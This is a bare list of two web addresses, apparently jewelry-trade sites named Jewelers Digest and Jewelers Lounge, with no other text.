http://www.jewelersdigest.com/

http://www.jewelerslounge.com/
